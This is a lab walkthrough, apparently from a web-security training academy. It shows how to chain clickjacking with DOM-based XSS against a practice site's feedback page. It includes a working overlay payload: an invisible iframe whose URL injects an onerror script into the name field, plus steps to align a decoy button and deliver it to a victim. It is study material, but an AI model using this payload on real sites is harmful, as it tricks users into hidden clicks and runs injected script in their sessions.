Exploiting clickjacking vulnerability to trigger DOM-based XSS

Description

This lab contains an XSS vulnerability that is triggered by a click.

Reproduction and proof of concept

  1. Log in to the wiener account on the target website and find vuln.

Clickjacking Clickjacking Clickjacking

  1. Create payload:

  • The iframe src URL points to the target website vulnerable page. In this case, the /feedback page, and depends on the unique lab-id.

  • An initial opacity of 0.1 to align the iframe actions and adjust the position values.

  • Initial $top_value and $side_value values of resp 610px and 80px to align the “Submit feedback” button with the “Test me” decoy action.

<style>
	iframe {
		position:relative;
		width:$width_value;
		height: $height_value;
		opacity: $opacity;
		z-index: 2;
	}
	div {
		position:absolute;
		top:$top_value;
		left:$side_value;
		z-index: 1;
	}
</style>
<div>Test me</div>
<iframe src="lab-id.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>

  1. Go to the exploit server and paste the payload into the body field of the form.

  2. Click Store and then View exploit. Hover over “Test me” to make sure the cursor changes to a hand indicating that the div element is positioned correctly. If it is not, adjust the position of the div element by modifying the top and left properties of the style sheet.

  3. Change “Test me” to “Click me”, set opacity to 0.0001, and click Store.

Clickjacking

  1. Deliver exploit to victim

Exploitability

An attacker needs to construct a clickjacking attack that fools the user into clicking the “Click me” button to call the print() function.